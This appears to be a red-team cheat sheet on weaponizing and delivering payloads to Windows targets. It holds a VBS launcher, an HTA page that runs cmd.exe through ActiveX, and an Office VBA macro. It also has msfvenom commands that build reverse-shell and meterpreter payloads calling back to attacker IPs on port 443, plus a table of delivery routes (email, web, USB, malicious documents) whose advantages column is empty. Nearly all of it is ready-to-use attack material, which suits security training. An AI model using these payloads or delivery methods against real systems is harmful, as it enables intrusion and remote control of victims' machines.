Weaponization and Delivery
Developing deliverable payloads.
Last updated: May 4th, 2023WSH
#Executing exe within vbs file
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,TrueHTA
Simple
<html>
<body>
<script>
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
Metasploit
#reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o shell.hta
#or
msf6 > use exploit/windows/misc/hta_server
VBA
Office
To make the macro work, we need to save it in Macro-Enabled format such as:
- Word
- .dot
- .dotm
- .docm
- PowerPoint
- .pptm
- .potm
- .ppsm
- .ppam
- .ppa
- Excel
- .xls
- .xlt
- .xlsb
- .xlsm
- .xltm
- .xlam
The Macro:
Sub PoC()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End Sub
#or
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.159.15 LPORT=443 -f vbaMain Delivery Methods
| Delivery Method | Description | Advantages |
|---|---|---|
| Weaponized scripts are delivered through malicious email attachments or links. |
|
|
| Web | Weaponized scripts are hosted on a compromised or malicious website. |
|
| USB | Weaponized scripts are placed on a USB drive and physically delivered or left in a targeted location. |
|
| Malicious Document | Weaponized scripts are embedded within seemingly harmless documents (e.g., Word, Excel, PDF). |
|